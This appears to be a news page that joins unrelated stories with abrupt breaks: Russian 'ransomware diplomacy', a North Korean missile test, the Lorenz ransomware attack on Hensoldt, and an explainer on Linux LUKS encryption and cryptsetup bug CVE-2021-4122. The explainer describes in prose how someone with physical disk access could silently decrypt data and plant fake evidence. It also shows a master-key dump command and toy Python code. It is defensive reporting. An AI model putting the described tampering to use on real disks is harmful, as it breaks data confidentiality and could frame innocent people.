President Biden has warned that Russia can expect severe sanctions should it choose to invade Ukraine. But Putin in turn has said such sanctions could cause a complete break in diplomatic relations between the two countries.
Dmitri Alperovitch, co-founder of and former chief technology officer for the security firm CrowdStrike, called the REvil arrests in Russia “ransomware diplomacy.”
“This is Russian ransomware diplomacy,” Alperovitch said on Twitter. “It is a signal to the United States — if you don’t enact severe sanctions against us for invasion of Ukraine, we will continue to cooperate with you on ransomware investigations.”
The REvil arrests were announced as many government websites in Ukraine were defaced by hackers with an ominous message warning Ukrainians that their personal data was being uploaded to the Internet. “Be afraid and expect the worst,” the message warned.
Experts say there is good reason for Ukraine to be afraid. Ukraine has long been used as the testing grounds for Russian offensive hacking capabilities. State-backed Russian hackers have been blamed for the Dec. 23, 2015 cyberattack on Ukraine’s power grid that left 230,000 customers shivering in the dark.
Russia also has been suspected of releasing NotPetya, a large-scale cyberattack initially aimed at Ukrainian businesses that ended up creating an extremely disruptive and expensive global malware outbreak.
Although there has been no clear attribution of these latest attacks to Russia, there is reason to suspect Russia’s hand, said David Salvo, deputy director of The Alliance for Securing Democracy.
“These are tried and true Russian tactics. Russia used cyber operations and information operations in the run-up to its invasion of Georgia in 2008. It has long waged massive cyberattacks against Ukrainian infrastructure, as well as information operations targeting Ukrainian soldiers and Ukrainian citizens. And it is completely unsurprising that it would use these tactics now when it is clear Moscow is looking for any pretext to invade Ukraine again and cast blame on the West in its typical cynical fashion.”
According to South Korea’s military, North Korea conducted its third suspected weapons test of the year on Friday, firing an “unidentified projectile” from its east coast.
This comes hours after the US Treasury Department announced sanctions on eight North Korean and Russian individuals and entities for supporting North Korea’s ballistic missile programs.
Hensoldt, a multinational defense contractor headquartered in Germany, has confirmed that some of its UK subsidiary’s systems were compromised in a ransomware attack.
The defense multinational, which develops sensor solutions for defense, aerospace, and security applications, is listed on the Frankfurt Stock Exchange and had a turnover of 1.2 billion euros in 2020.
It operates in the US under a special agreement that allows it to apply for classified and sensitive US government contracts.
Its products include radar arrays, avionics, and laser rangefinders used on M1 Abrams tanks, various helicopter platforms, and LCS (Littoral Combat Ship) by the US Army, US Marine Corps, and the US National Guard.
Hensoldt announced on Thursday that it’s equipping German-Norwegian U212 CD submarines built by the kta consortium with next-generation fully digital optronics equipment.
While the company is yet to issue a public statement regarding this incident, the Lorenz ransomware gang has already claimed the attack.
On Wednesday, a Hensoldt spokesperson confirmed Lorenz’s claims after BleepingComputer reached out over email.
“I can confirm that a small number of mobile devices in our UK subsidiary has been affected,” Hensoldt’s Head of Public Relations, Lothar Belz, told BleepingComputer.
However, Belz declined to provide additional information regarding the incident, saying that “for obvious reasons, we do not disclose any more details in such cases.”
Ransomware gang says they were paid
For its part, the Lorenz ransomware group claims to have stolen an undisclosed number of files from Hensoldt’s network during the attack.
The gang says payment has been made, with 95% of all stolen files published on the ransomware’s data leak website since December 8, 2021, when the Hensoldt leak page was created.
While Lorenz shows the leak as being “Paid,” it’s unclear if that means Hensoldt paid a ransom or if another threat actor purchased the data.
This is because the Lorenz ransomware gang is known for selling stolen data to other threat actors to pressure victims into paying ransoms.
If no ransom is paid after all data is leaked as password-protected RAR archives, Lorenz will also release the password to access the data leak archives to make the stolen files publicly available to anyone who downloads leaked archives.
This ransomware gang will also sell access to the victims’ internal networks to other threat actors along with any stolen data.
Lorenz began operating in April 2021 and has since been targeting enterprise organizations worldwide, demanding hundreds of thousands of dollars in ransoms from each of their victims.
In June, Dutch cybersecurity firm Tesorion released a free Lorenz ransomware decryptor, which victims can use to recover some file types, including Office documents, PDF files, images, and videos.
Lots of people “run Linux” without really knowing or caring – many home routers, navigational aids, webcams and other IoT devices are based on it; the majority of the world’s mobile phones run a Linux-derived variant called Android; and many, if not most, of the ready-to-go cloud services out there, rely on Linux to host your content.
But plenty of users and sysadmins don’t just “use Linux”, they’re responsible for hundreds, thousands, perhaps even millions of other people’s desktops, laptops and servers on which Linux is running.
Those sysadmins are usually responsible not merely for ensuring that the systems under their jurisdiction are running reliably, but also for keeping them as safe and secure as they can.
In today’s world, that almost certainly means knowing, understanding, deploying and managing some sort of full-disk encryption system, and on Linux, that probably means using a system called LUKS (Linux Unified Key Setup) and a program called cryptsetup to look after it.
FDE for the win
Full-disk encryption, usually referred to simply as FDE, is a simple but effective idea: encrypt every sector just before it’s written to the disk, regardless of the software, user, file or directory that it belongs to; decrypt every sector just after it’s read back in.
FDE is rarely enough on its own, because there’s basically one password for everything, so you usually end up layering further levels of file-specific, app-specific or user-specific password protection on top of it.
But FDE can be considered mandatory these days, notably for laptops, for exactly the same reason: there is AT LEAST one password for everything, so there’s nothing left behind that isn’t encrypted at all.
With FDE, you don’t have to worry about files you might have forgotten to encrypt; or those temporary copies you made from an encrypted folder into an unencrypted one while preparing for a handover; or those annoyingly plentiful intermediate files that are unavoidably generated by your favourite apps when you use menu options such as Export, Compile or Print.
With FDE, everything gets encrypted, including unused parts of the disk, deleted sectors, filenames, swapfile data, the apps you’re using, the operating system files you’ve installed, and even the disk space you’ve deliberately zeroed out to forcibly overwrite what was there before.
After all, if you leave nothing unencrypted and your laptop gets stolen, the data on the disk isn’t much use to the thieves, or to the cybercrooks they sell it to.
If you can show that you did, indeed, install FDE on the now-missing laptops, then you can put your hand on your heart and swear to your auditors, to your regulators, to your customers – and even to inquisitive journalists! – that they have little or nothing to fear if that stolen laptop ever shows up on the dark web.
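The per-sector transform at the heart of FDE can be sketched in a few lines. This is a toy model for illustration only: the SHA-256 counter-mode keystream below is a hypothetical stand-in for the AES-XTS cipher that a real FDE system such as LUKS would use, but it shows the essential shape of the scheme: every sector is encrypted independently, keyed by both the master key and the sector number.

```python
import hashlib

SECTOR = 512  # bytes per sector, as on a classic disk

def keystream(key: bytes, sector_no: int, length: int) -> bytes:
    """Toy keystream: SHA-256 in counter mode over (key, sector number).
    A real FDE system would use AES-XTS with the sector number as tweak."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + sector_no.to_bytes(8, "big")
                              + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def crypt_sector(key: bytes, sector_no: int, data: bytes) -> bytes:
    """XOR with the per-sector keystream: the same call encrypts and decrypts."""
    ks = keystream(key, sector_no, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))

key = b"\x01" * 32
plain = b"secret".ljust(SECTOR, b"\x00")
enc = crypt_sector(key, 7, plain)            # encrypt on the way to "disk"
assert crypt_sector(key, 7, enc) == plain    # decrypt on the way back
assert crypt_sector(key, 8, enc) != plain    # wrong sector number yields garbage
```

Because XOR with a keystream is its own inverse, the same function serves both the write path (encrypt) and the read path (decrypt), which is why FDE can sit transparently underneath the filesystem.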
FDE considered green
Better yet, if you want to retire old equipment – especially if it’s not working reliably – then FDE generally makes it much less controversial to send the old gear for generic reuse or recycling.
FDE means that if someone with ulterior motives buys up superannuated kit from your recycling company, extracts the old disk drives and somehow coaxes them back to life, they won’t easily be able to dump your old data for fun and profit.
Without FDE, old storage devices become a bit like nuclear waste: there are very few people you dare trust them to for “repurposing”, so you typically end up with old safes crammed with “we aren’t sure what to do with these yet” disk drives, or with a laborious device destruction protocol that is nowhere near as environmentally friendly as it ought to be.
(Dropping old materiel into a blast furnace is fast and effective – law enforcement teams have been known to do this, live on TV, after weapons amnesties aimed at reducing endemic violence – but blindly vapourising computer kit and its many esoteric metals and polymers is no longer an acceptable face of “secure erasure”.)
But what if there’s a bug?
The problem with FDE – and, just as importantly, the software tools that help you manage it reliably – is that it’s easy to do badly.
Did you use the right cryptographic algorithm? Did you generate the encryption keys reliably? Did you handle the issue of data integrity properly? Can you change passwords safely and quickly? How easy is it to lock yourself out by mistake? What if you want to adjust the encryption parameters as your corporate policies evolve?
Unfortunately, the cryptsetup program, widely used to manage Linux FDE in a way that addresses the questions above, turns out to have had a nasty bug, dubbed CVE-2021-4122, in a useful feature it offers called re-encryption.
A well-designed FDE solution doesn’t use your password directly as a raw, low-level encryption key, for several good reasons:
Changing the low-level key means decrypting and re-encrypting the entire disk. This may take several hours.
Multiple users need to share a single key. So you can’t retire one user’s access without locking out everyone else at the same time.
Users often choose weak passwords, or suffer password breaches. If you realise this just happened, the faster you can change the password, the better.
So, most FDE systems choose a random master key for the device – for LUKS, it’s usually 512 bits long and comes from the kernel’s high-quality random generator.
Each password holder, up to 8 of them by default, chooses a personal password that’s used to create a personally-scrambled version of the master key stored in what LUKS calls a keyslot, so that the master key itself never actually needs to be stored anywhere except in memory while the device is in use.
Simply put: you can’t derive the master key for the device unless and until you provide a valid user key; none of the user keys are stored anywhere on the device; and neither the user keys nor the master key are ever revealed or stored in their plaintext forms by default.
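That keyslot arrangement can be sketched as follows. This is a simplified illustration, not the real LUKS keyslot format: the toy XOR wrap stands in for the AES encryption and anti-forensic key splitting that LUKS actually performs, but the stdlib PBKDF2 password-to-key derivation and the rewrap-on-password-change behaviour mirror the real design.

```python
import hashlib, os, secrets

def wrap(password: bytes, salt: bytes, master_key: bytes) -> bytes:
    """Derive a wrapping key from the password and XOR-wrap the master key.
    (Toy wrap for illustration; real LUKS encrypts the keyslot with AES.)"""
    kek = hashlib.pbkdf2_hmac("sha256", password, salt, 100_000,
                              dklen=len(master_key))
    return bytes(a ^ b for a, b in zip(master_key, kek))

def unwrap(password: bytes, salt: bytes, slot: bytes) -> bytes:
    return wrap(password, salt, slot)   # XOR wrap is its own inverse

master_key = secrets.token_bytes(64)    # random 512-bit volume key
salt = os.urandom(16)
slot0 = wrap(b"alice's passphrase", salt, master_key)

# A valid password recovers the master key; a wrong one yields garbage.
assert unwrap(b"alice's passphrase", salt, slot0) == master_key
assert unwrap(b"wrong password", salt, slot0) != master_key

# Changing the password only rewraps the master key in the keyslot;
# the bulk data on disk, encrypted under the master key, is untouched.
slot0 = wrap(b"new passphrase", salt, master_key)
assert unwrap(b"new passphrase", salt, slot0) == master_key
```

This is why LUKS can support several password holders and instant password changes: only the small keyslot is rewritten, never the terabytes of encrypted payload.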
You can dump the master key for a LUKS device, but it’s hard to do by mistake, and you need to put in a valid user key to generate the master key data:
# cryptsetup luksDump /dev/sdb --dump-master-key
WARNING!
========
The header dump with volume key is sensitive information
that allows access to encrypted partition without a passphrase.
This dump should be stored encrypted in a safe place.
Are you sure? (Type 'yes' in capital letters): YES
Enter passphrase for /dev/sdb: ****************
LUKS header information for /dev/sdb
Cipher name: aes
Cipher mode: xts-plain64
Payload offset: 32768
UUID: 72f6e201-cbdc-496b-98bd-707ece662c9a
MK bits: 512 <-- MK is short for "master key"
MK dump: 7a 31 05 ba f3 68 b6 be e5 6c 6f 16 92 44 ea 35
0b 66 fe ce ae ec a9 ec 22 db ea c9 9e 15 4d 60
f8 d0 b9 cb b5 1f ab f4 8f d3 e9 c1 1f 05 37 73
7d 64 df 8b be 38 e4 49 29 d1 5d 95 cd a4 9b 04
#
Reencryption options
As mentioned above, you sometimes need to change the master encryption settings on a device, especially if you need to adjust some of the parameters you used to keep up with changing encryption recommendations, such as switching to a larger key size.
For this purpose, cryptsetup provides a handy, but complex-to-implement, option called reencrypt, which actually takes care of three different processes: decrypting, encrypting, and re-encrypting your data, even while the device is in use.
Re-encrypting can, of course, be implemented with nothing more than options called --decrypt and --encrypt, but to re-encrypt a device while it is being used would then require you to decrypt the whole thing first, and then encrypt it again from pure plaintext later on.
That would leave you exposed to danger for much longer than is strictly necessary: if the device took 12 hours to decrypt and another 12 hours to encrypt again from scratch, at least some of the data on the disk would be in plaintext form for a full day, and more than 50% of the data would be in plaintext form for at least 12 hours.
Streamlining re-encryption
So, cryptsetup allows you to streamline the re-encryption process by keeping some of the disk encrypted with the old key, and the rest of it encrypted with the new key, while carefully keeping track of how far it’s got in case the process breaks half way through, or the computer needs to be shut down before the process has finished.
When you start up again, and a duly authorised user enters a password to mount the device (the user’s password temporarily decrypts both the old master key and the new one, so the double-barrelled decrypt-recrypt process can continue), the re-encryption process continues from where it left off…
…and at the end, the old master key is wiped out, and the new one committed as the sole encryption key for the underlying data.
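The resumable decrypt-and-recrypt loop can be modelled in miniature. This sketch is not cryptsetup’s code: the toy keystream cipher and the in-memory “disk” are illustrative stand-ins, but the checkpointed loop shows why the process can survive an interruption and carry on from where it stopped, with each sector encrypted under exactly one of the two keys at all times.

```python
import hashlib

def keystream(key: bytes, sector_no: int, length: int) -> bytes:
    """Toy per-sector keystream (stand-in for AES-XTS)."""
    out, ctr = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + bytes([sector_no])
                              + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:length]

def crypt(key: bytes, sector_no: int, data: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, keystream(key, sector_no, len(data))))

def reencrypt(disk, old_key, new_key, progress, stop_at=None):
    """Walk the disk sector by sector: decrypt with the old key, re-encrypt
    with the new one, and return how far we got so a crash can be resumed."""
    for i in range(progress, len(disk)):
        if stop_at is not None and i >= stop_at:
            return i   # simulated crash / shutdown part-way through
        disk[i] = crypt(new_key, i, crypt(old_key, i, disk[i]))
    return len(disk)

old, new = b"old-master-key", b"new-master-key"
plain = [("sector %d" % i).encode().ljust(32, b".") for i in range(8)]
disk = [crypt(old, i, p) for i, p in enumerate(plain)]

progress = reencrypt(disk, old, new, 0, stop_at=3)   # interrupted after 3 sectors
progress = reencrypt(disk, old, new, progress)       # ...resumes where it left off

# Every sector now decrypts correctly under the new key alone.
assert all(crypt(new, i, s) == p for i, (s, p) in enumerate(zip(disk, plain)))
```

The `progress` counter plays the role of the tracking metadata that cryptsetup stores on disk, and that metadata is precisely what the vulnerability below allowed an attacker to tamper with.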
Unfortunately, code that had been carefully designed to handle re-encryption was reused to implement the less useful but sometimes necessary options for “fully decrypt to plaintext” (equivalent to re-encrypting with a null cipher in the encryption stage), and “fully encrypt from plaintext” (essentially re-encryption with a null cipher in the decryption part).
And when repurposed in this way, the careful checks used in reencrypt mode – to make sure that no one had tampered with the temporary data used to track how far the process had got, and thus to prevent abuse of the re-encrypt procedure by someone with root access to the disk but no knowledge of the password – were not carried over. As the bug report explains:
“The problem was caused by reusing a mechanism designed for actual reencryption operation without reassessing the security impact for new encryption and decryption operations. While the reencryption requires calculating and verifying both key digests, no digest was needed to initiate decryption recovery if the destination is plaintext (no encryption key).”
Simply put: someone with physical access to the disk, but who did not have the password to decrypt it themselves, could deceive the re-encryption tool into thinking that it was part-way through a decrypt-only procedure, and therefore trick the FDE software into decrypting part of the disk, and leaving it unencrypted.
As the bug-fix explains, the LUKS system itself cannot “protect against intentional modification [because someone with physical access to the disk could write to it without going through the LUKS code], but such modification must not cause a violation of data confidentiality.”
And that’s the risk here: that you could end up with a disk that seems to be encrypted; that still needs a valid password to mount; that behaves as if it’s encrypted; that might satisfy your auditors that it is encrypted…
…but that nevertheless contains (perhaps large and numerous) chunks that are not only stored in plaintext but also won’t get re-encrypted later on.
Even worse, perhaps, is the observation that:
The attack can also be reversed afterward (simulating crashed encryption from a plaintext) with possible modification of revealed plaintext.
What this means is that a malevolent user could silently decrypt parts of a disk, for example on a server, without the password, quietly modify the decrypted data while it was in plaintext form – thanks to the lack of integrity protection in plaintext mode – and then seamlessly and surreptitiously re-encrypt and “re-integrify” the data later on.
Loosely put, they could – in theory, at least – stitch you up for something quite naughty – fraudulent-looking entries in a spreadsheet, perhaps, or improper commands in your Bash history such as downloading a cryptominer – by inserting bogus “evidence” and then re-encrypting it under your password, even though they don’t actually know your password.
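The essence of the fix is that recovery metadata must carry a digest that only a key holder can produce, so a forged “decryption in progress” marker gets rejected. Here is a toy illustration of that idea (not cryptsetup’s actual mechanism), using an HMAC keyed with the volume master key:

```python
import hmac, hashlib

def make_resume_marker(master_key: bytes, target: str, progress: int) -> dict:
    """Bind the recovery metadata to the volume key with an HMAC, so only
    someone who knows the key can produce a valid 'operation in progress' state."""
    msg = f"{target}:{progress}".encode()
    return {"target": target, "progress": progress,
            "digest": hmac.new(master_key, msg, hashlib.sha256).hexdigest()}

def marker_is_valid(master_key: bytes, marker: dict) -> bool:
    msg = f"{marker['target']}:{marker['progress']}".encode()
    good = hmac.new(master_key, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(good, marker["digest"])

key = b"volume-master-key"
marker = make_resume_marker(key, "encrypt", 1000)
assert marker_is_valid(key, marker)

# An attacker with disk access but no key tries to fake "decrypt to plaintext":
forged = {"target": "plaintext", "progress": 0, "digest": "00" * 32}
assert not marker_is_valid(key, forged)
```

With a check of this kind in place, an attacker who can write to the on-disk header but does not hold the key cannot initiate a bogus decrypt-to-plaintext recovery, which is the gap CVE-2021-4122 closed.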
What to do?
Upgrade to cryptsetup 2.4.3 or later. If you run a Linux distro that provides regular updates, you may already have this version. (Use cryptsetup --version to find out.)
Learn how to detect when the reencrypt option is in use. You can use the luksDump function to see if partial decryption/encryption is in progress. (See below.)
Restrict physical access as carefully as you can. Sometimes, for example if you are using cloud services or co-located servers, you don’t have total control over who can get at what. But even in a world of trusted computing modules and tamper-proof cryptographic chips, there’s no need to give everyone access if you can avoid it.
CRYPTSETUP COMMANDS TO TRACK RE-ENCRYPTION
--> First command tells cryptsetup to boost the master key length to 512 bits
# cryptsetup reencrypt /dev/sdb --key-size 512
Enter passphrase for key slot 1:
[. . .]
--> While re-encrypting, you will see two extra keyslots in use, one to access
--> the new master key (slot 0 here) and the other to keep track of how far
--> the decrypt-and-recrypt process has got (slot 2 here)
# cryptsetup luksDump /dev/sdb
[. . .]
Keyslots:
0: luks2 (unbound)
Key: 512 bits
[. . .]
Salt: f4 be b9 3f 15 bc 8f 97 43 2c f8 1f 31 e3 60 d1
[. . .]
1: luks2
Key: 256 bits
[. . .]
Salt: 75 33 81 96 ba f3 ec 8a dc ef 28 dc 68 a9 a7 44
[. . .]
2: reencrypt (unbound)
Key: 8 bits
Priority: ignored
Mode: reencrypt
Direction: forward
[. . .]
--> After the re-encryption is complete, keyslot 1 (for access to the
--> old master key) is removed, keyslot 2 (denoting the progress of the
--> procedure) is removed, and keyslot 0 takes over for access to the device
# cryptsetup luksDump /dev/sdb
[. . .]
Keyslots:
0: luks2
Key: 512 bits
[. . .]
Salt: f4 be b9 3f 15 bc 8f 97 43 2c f8 1f 31 e3 60 d1
[. . .]